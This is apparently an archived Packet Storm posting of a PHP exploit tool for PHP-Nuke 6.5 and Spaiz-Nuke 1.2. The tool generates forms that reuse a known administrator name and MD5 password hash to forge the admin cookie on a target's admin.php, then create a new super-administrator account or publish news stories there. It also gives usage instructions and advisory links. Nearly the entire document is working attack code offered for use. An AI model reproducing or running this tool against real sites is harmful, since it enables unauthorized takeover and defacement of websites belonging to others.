PHP-Nuke v6.5 and Spaiz-nuke v1.2 SQL injection exploit written in PHP. Adds an admin account.
47cd69171dda836213caa1d223b99cca8f4117002517f1b0aadbde2461f80ce7Hello, Here my Exploit for PHP-Nuke >= v6.5 & Spaiz-Nuke SQL > v1.2 SQL
Injection
Code in PHP:
Grettings, Blade...
<?php
/* PHP-Nuke & Spaiz-Nuke SQL Injection Exploit v2.2
By
BBBBBBBB lll aaaaaaaa ddddddd eeeeeeeee
BBBBBBBBB lll aaaaaaaaa ddddddddde eeeeeeeee
BBBBBBBBBB lll aaaaaaaaad ddddddddde eeeeeeeeee
BBB lll aad de
BBB lll aaaaaaaaaad dde eeeeeeeeee
BBBBBBBBBB lll aaaaaaaaaad ddd dde eeeeeeeeee
BBBBBBBBBB lll aaaaaaaaaa ddd ddeeeeeeeeeeee
BBBBBBBBBB lll aaa aaa ddd dddeeee
BBB BBB lll aaa aaa ddd ddd eee
BBB BBBB lll aaa aaa ddd ddd eee
BBBBBBBBB lllllllaaa dddddddddd eeeeeeeeee
BBBBBBBBB llllllaaa ddddddddddd eeeeeeeee
BBBBBBBB lllll aa dddddddddd eeeeeee
<blade@abez.org>
|Blade «blade@abez.org»|
****www.abez.org Of AbeZ
***www.rzw.com.ar By XyborG
**www.adictosnet.com.ar By LaKosa
*www.fihezine.tsx.to Of FiH eZine
*/
echo'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01
Transitional//EN"><html><head>
<title>PHP-Nuke And Spaiz-Nuke Injection Exploit v2.2 By
Blade</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
1"><STYLE type=text/css>
.bginput { FONT-SIZE: 9px; COLOR: #000000; FONT-FAMILY:
Verdana,Arial,Helvetica,sans-serif }
A:link { COLOR: #000066; TEXT-DECORATION: none }
A:visited { COLOR: #000066; TEXT-DECORATION: none }
A:active { COLOR: #000066; TEXT-DECORATION: none }
A:hover { COLOR: #000066; TEXT-DECORATION: none }
.button { FONT-SIZE: 10px; COLOR: #000000; FONT-FAMILY:
Verdana,Arial,Helvetica,sans-serif }
</STYLE></head><body bgcolor="#FDFEFF" text="#000000" link="#363636"
vlink="#363636" alink="#d5ae83">
<!-- PHP-Nuke & Spaiz-Nuke SQL Injection Exploit v2.2 - Original Code
By Blade<blade@abez.org> -->';
if (($action == "goAdmin") and ($server) and ($add_name) and ($add_email)
and ($add_aid) and ($add_pwd)){
$admin_name = chop($admin_name); $admin_hash = chop($admin_hash);
$server = chop($server); $add_pwd = chop($add_pwd);
$hash = $admin_name . ":" . $admin_hash . ":";
$hash = base64_encode($hash);
echo "<form name='add' method='post' action='http://" . $server .
"/admin.php'>
<input type='hidden' name='op' value='AddAuthor'>
<input type='hidden' name='add_name' value='" . $add_name . "'>
<input type='hidden' name='add_aid' value='" . $add_aid . "'>
<input type='hidden' name='add_email' value='" . $add_email . "'>
<input type='hidden' name='add_url' value='" . $add_url . "'>
<input type='hidden' name='add_pwd' value='" . $add_pwd . "'>
<input type='hidden' name='add_radminsuper' value='" .
$add_radminsuper . "'>
<input type='hidden' name='admin' value=" . $hash .">
<center><font size='1' face='Verdana, Arial, Helvetica, sans-
serif'>Servidor
vulnerable : <strong>http://" . $server . "</strong> . <br>Clave
Hash : <strong>" .
$hash . "</strong> . <br>Nuevo Administrador : <strong>" . $add_name
. "</strong>.
En caso de que estos datos no sean correctos vuelva atras desde
<a href='javascript:history.back()
'><strong>«Aquí»</strong></a>.</font>
<br><br><font size='1' face='Verdana, Arial, Helvetica, sans-
serif'><b>Si son correctos
continue la operacion agregando el nuevo
Administrador.</b></font></center>
<center><input name='AddSysop' type='submit' id='AddSysop'
value='Agregar Administrador' class='button'></center>
</form>";
} elseif (($action == "goNews") and ($server) and ($subject) and
($hometext) and ($bodytext)){
$admin_name = chop($admin_name); $admin_hash = chop($admin_hash);
$server = chop($server); $add_pwd = chop($add_pwd);
$hash = $admin_name . ":" . $admin_hash . ":";
$hash = base64_encode($hash);
echo "<form name='addNews' method='post' action='http://" . $server
. "/admin.php'>
<input name='op' type='hidden' id='op' value='PostAdminStory'>
<input name='topic' type='hidden' id='topic' value='1'>
<input name='catid' type='hidden' id='catid' value='0'>
<input name='ihome' type='hidden' id='ihome' value='0'>
<input type='hidden' name='subject' value='" . $subject . "'>
<input type='hidden' name='hometext' value='" . $hometext . "'>
<input type='hidden' name='bodytext' value='" . $bodytext . "'>
<input type='hidden' name='acomm' value='" . $acomm . "'>
<input type='hidden' name='automated' value='" . $automated . "'>
<input type='hidden' name='day' value='" . $day . "'>
<input type='hidden' name='month' value='" . $month . "'>
<input type='hidden' name='year' value='" . $year . "'>
<input type='hidden' name='hour' value='" . $hour . "'>
<input type='hidden' name='min' value='" . $min . "'>
<input type='hidden' name='admin' value=" . $hash .">
<center>
<font size='1' face='Verdana, Arial, Helvetica, sans-serif'>Servidor
vulnerable : <strong>http://" . $server . "</strong> . <br>
Clave Hash : <strong>" . $hash . "</strong> . <br>
Asunto de la Noticia: <strong>" . $subject . "</strong>. <br>
La Noticia es: <strong>" . $hometext . "</strong>. <br>
En caso de que estos datos no sean correctos vuelva atras desde <a
href='javascript:history.back()'><strong>«Aquí»</strong></a>.</font> <br>
<br>
<font size='1' face='Verdana, Arial, Helvetica, sans-serif'><b>Si
son correctos continue la operacion agregando la noticia.</b></font>
</center>
<center>
<input name='AddSysop' type='submit' id='AddSysop' value='Agregar
Noticia' class='button'>
</center>
</form>";
} elseif($exploit == "news") {
echo'<FORM action="' . $PHP_Self . '" method=post>
<TABLE width="50%" border=0 align="center" cellPadding=0
cellSpacing=0>
<TR><TD colspan="3"><div align="center"><strong><font color="#003366"
size="1" face="Verdana, Arial, Helvetica, sans-serif"><u>Server
Vulnerable:</u></font></strong></div></TD>
</TR>
<TR> <TD width="39%"> <div align="center"><font size="1"
face="Verdana, Arial, Helvetica, sans-serif"><strong>Server
Adress:</strong></font></div></TD>
<TD width="13%"><div align="right"><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">http://</font></div></TD>
<TD width="48%"><div align="left"><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">
</font>
<input name="server" type="text" class="bginput" id="server"
value="www.">
</div></TD>
</TR>
<TR> <TD> <div align="center"><strong><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">Admin
Name:</font></strong></div></TD>
<TD> </TD>
<TD> <p align="left"> <input name="admin_name" type="text"
id="admin_name" class="bginput">
</p></TD>
</TR>
<TR> <TD><div align="center"><strong><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">Password MD5:</font></strong></div></TD>
<TD> </TD>
<TD> <p align="left">
<input name="admin_hash" type="text" id="admin_hash" size="40"
class="bginput">
</p></TD>
</TR>
</TABLE><br>
<table width="50%" border="0" align="center">
<tr>
<td><div align="center"><strong><font color="#003366" size="1"
face="Verdana, Arial, Helvetica, sans-serif"><u>The
News:</u></font></strong></div></td>
</tr>
<tr> <td><div align="center"><strong><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">
<input name="action" type="hidden" id="action" value="goNews">
Title</font></strong><font size="1" face="Verdana, Arial, Helvetica,
sans-serif">(Obligatory)<strong>:<br>
<input size=50 name=subject class="bginput">
</strong></font></div></td>
</tr>
<tr> <td><div align="center"><font size="1" face="Verdana, Arial,
Helvetica, sans-serif"><strong>Text of
the News</strong>(Obligatory)<strong>:<br>
<textarea name=hometext rows=5 wrap=virtual cols=50
class="bginput"></textarea>
</strong></font></div></td>
</tr>
<tr> <td><div align="center"><font size="1" face="Verdana, Arial,
Helvetica, sans-serif"><strong>Extended
Text</strong>(Obligatory)<strong>:<br>
<textarea name=bodytext rows=12 wrap=virtual cols=50
class="bginput"></textarea>
</strong></font></div></td>
</tr>
<tr> <td><div align="center"><font size="1" face="Verdana, Arial,
Helvetica, sans-serif">Active Commentaries for
this News?<strong>
<input type=radio checked value=0 name=acomm>
Yes
<input type=radio value=1 name=acomm>
No</strong><strong></strong></font></div></td>
</tr>
<tr> <td><div align="center"><font size="1" face="Verdana, Arial,
Helvetica, sans-serif">You want to program
this history?<strong>
<input type=radio value=1 name=automated>
Yes
<input type=radio checked value=0 name=automated>
No<br>
<br>
Day:
<input name="day" type="text" id="day3" value="' . date(d) . '"
size="4" class="bginput">
Month:
<select name="month" id="select2" class="bginput">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12" selected>12</option>
</select>
Year:
<input maxlength=4 size=5 value="' . date(Y) . '" name=year
class="bginput">
<br>
Hour:
<select name=hour class="bginput">
<option selected name="hour">00</option>
<option name="hour">01</option>
<option name="hour">02</option>
<option name="hour">03</option>
<option name="hour">04</option>
<option name="hour">05</option>
<option name="hour">06</option>
<option name="hour">07</option>
<option name="hour">08</option>
<option name="hour">09</option>
<option name="hour">10</option>
<option name="hour">11</option>
<option name="hour">12</option>
<option name="hour">13</option>
<option name="hour">14</option>
<option name="hour">15</option>
<option name="hour">16</option>
<option name="hour">17</option>
<option name="hour">18</option>
<option name="hour">19</option>
<option name="hour">20</option>
<option name="hour">21</option>
<option name="hour">22</option>
<option name="hour">23</option>
</select>
: <select name=min class="bginput">
<option selected name="min">00</option>
<option name="min">05</option>
<option name="min">10</option>
<option name="min">15</option>
<option name="min">20</option>
<option name="min">25</option>
<option name="min">30</option>
<option name="min">35</option>
<option name="min">40</option>
<option name="min">45</option>
<option name="min">50</option>
<option name="min">55</option>
</select>
: 00</strong></font></div></td>
</tr>
<tr> <td><div align="center"><font size="1" face="Verdana, Arial,
Helvetica, sans-serif"><strong> <input name="submit" type=submit value="Add
News" class="button">
</strong></font></div></td>
</tr>
</table><center><strong><font color="#000066" size="1"
face="Tahoma"><a href="' . $PHP_Self . '?exploit=admin">[ View exploit of
the Administrators ]</a> </font></strong></center>';
} else {
echo'<FORM action="' . $PHP_Self . '" method=post>
<p align="center"><u><strong><font size="2" face="Verdana, Arial,
Helvetica, sans-serif">
<input name="action" type="hidden" id="action" value="goAdmin">
</font></strong></u></p>
<div align="center">
<TABLE width="50%" border=0 align="center" cellPadding=0
cellSpacing=0>
<TR><TD colspan="3"><div align="center"><strong><font color="#003366"
size="1" face="Verdana, Arial, Helvetica, sans-serif"><u>Server
Vulnerable:</u></font></strong></div></TD>
</TR>
<TR> <TD width="39%"> <div align="center"><font size="1"
face="Verdana, Arial, Helvetica, sans-serif"><strong>Server
Adress:</strong></font></div></TD>
<TD width="13%"><div align="right"><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">http://</font></div></TD>
<TD width="48%"><div align="left"><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">
</font>
<input name="server" type="text" class="bginput" id="server"
value="www.">
</div></TD>
</TR>
<TR> <TD> <div align="center"><strong><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">Admin
Name:</font></strong></div></TD>
<TD> </TD>
<TD> <p align="left">
<input name="admin_name" type="text" id="admin_name" class="bginput">
</p></TD>
</TR>
<TR> <TD><div align="center"><strong><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">Password MD5:</font></strong></div></TD>
<TD> </TD>
<TD> <p align="left">
<input name="admin_hash" type="text" id="admin_hash" size="40"
class="bginput">
</p></TD>
</TR>
</TABLE>
<br>
</div>
<TABLE width="50%" border=0 align="center">
<TBODY>
<TR> <TD colspan="2"><div align="center"><strong><font
color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-
serif"><u>Account
Data:</u></font></strong></div></TD>
</TR>
<TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-
serif"><strong>Name:</strong></font></TD>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
<INPUT maxLength=50 size=30 name=add_name class="bginput">
(Obligatory)</font></TD>
</TR>
<TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-
serif"><strong>Nickname:</strong></font></TD>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
<INPUT maxLength=30 size=30 name=add_aid class="bginput">
(Obligatory)</font></TD>
</TR>
<TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-
serif"><strong>E-Mail:</strong></font></TD>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
<INPUT maxLength=60 size=30 name=add_email class="bginput">
(Obligatory)</font></TD>
</TR>
<TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-
serif">URL:</font></TD>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
<INPUT name=add_url class="bginput" value="http://www." size=30
maxLength=60>
<strong> <input name="add_radminsuper" type="hidden"
id="add_radminsuper" value="1">
</strong> </font></TD>
</TR>
<TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-
serif"><strong>Password:</strong></font></TD>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
<INPUT type=password maxLength=12 size=12 name=add_pwd class="bginput">
(Obligatory)</font></TD>
</TR>
<INPUT type=hidden value=AddAuthor name=op>
</TABLE> <div align="center">
<INPUT name="submit" type=submit value="Create Administrator"
class="button">
</div>
</FORM><center><strong><font color="#000066" size="1"
face="Tahoma"><a href="' . $PHP_Self . '?exploit=news">[ View exploit of
News ]</a> </font></strong></center>';
} if (($action == "goAdmin") or ($action == "goNews")){
echo'';
}if (($action != "goAdmin") and ($action != "goNews")){
echo'<br><table width="100%" border="0" align="center">
<tr> <td colspan="2"><div align="center"><font color="#003366"
size="1" face="Verdana, Arial, Helvetica, sans-
serif"><strong><u>Usage:</u></strong></font></div></td>
</tr>
<tr> <td width="15%"><strong><font size="1"
face="Tahoma">»Server Adress
:</font></strong></td>
<td width="85%"><font size="1" face="Tahoma">It is the URL
corresponding to the
vulnerable Vestibule in PHP-Nuke. Example:
www.phpnuke.org.</font></td>
</tr>
<tr> <td><strong><font size="1" face="Tahoma">»Nombre Admin
:</font></strong></td>
<td><font size="1" face="Tahoma">It is the identity in value of name,
of the administrator who password is known enciphered. Example :
xMan.</font></td>
</tr>
<tr> <td><strong><font size="1" face="Tahoma">»Password MD5
:</font></strong></td>
<td><font size="1" face="Tahoma">He is password enciphered in MD5 of
the administrator,
whose name is known. Example: 1ea52f26e7e0ce08e462f87f5e35096c
</font></td>
</tr>
</table><br><div align="center">
<table width="45%" border="0" align="center">
<tr> <td colspan="2"><div align="center"><font color="#003366"
size="1" face="Verdana, Arial, Helvetica, sans-
serif"><strong><u>References:</u></strong></font></div></td>
</tr>
<tr> <td width="47%"><div align="center"><font size="1"
face="Tahoma">Discoverers
Bug :</font></div></td>
<td width="53%"><div align="center"><font size="1" face="Tahoma"><a
href="http://rst.void.ru/texts/advisory10.htm"
target="_blank">http://www.rst.void.ru</a> </font> <font size="1"
face="Tahoma"></font></div></td>
</tr>
<tr> <td><div align="center"><font size="1"
face="Tahoma"><strong>More Information</strong>
:</font></div></td>
<td><div align="center"><strong><font size="1" face="Tahoma"><a
href="http://www.rzw.com.ar/article895.html"
target="_blank"><u>http://www.rzw.com.ar</u></a></font></strong></div></td>
</tr>
<tr> <td><div align="center"><font size="1" face="Tahoma">More
Information :</font></div></td>
<td><div align="center"><font size="1" face="Tahoma"><a
href="http://www.security.nnov.ru/search/document.asp?docid=5201"
target="_blank">http://www.security.nnov.ru</a></font></div></td>
</tr>
<tr> <td>
<div align="center"><font size="1" face="Tahoma">More Information
:</font></div></td>
<td><div align="center"><font size="1" face="Tahoma"><a
href="http://www.cyruxnet.com.ar/phpnuke_modules.htm"
target="_blank">http://www.cyruxnet.com.ar</a></font></div></td>
</tr>
</table>';
}
echo'<center><p><a href="mailto:blade@abez.org"><u><strong><font
color="#CC0000" size="1" face="Tahoma">Original Exploit Code By
Blade.</font></strong></u></a><br><font color="#003366" size="1"
face="Verdana"><b>Version 2.2.</b></font></p></center>
</div>
</body>
</html>';
?>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed